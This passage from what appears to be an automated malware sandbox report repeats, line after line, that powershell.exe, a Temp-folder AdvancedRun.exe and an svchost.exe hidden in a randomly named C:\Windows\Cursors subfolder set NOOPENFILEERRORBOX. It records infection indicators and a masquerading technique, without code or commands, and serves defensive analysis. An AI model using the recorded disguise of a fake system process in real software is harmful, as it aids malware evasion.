          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
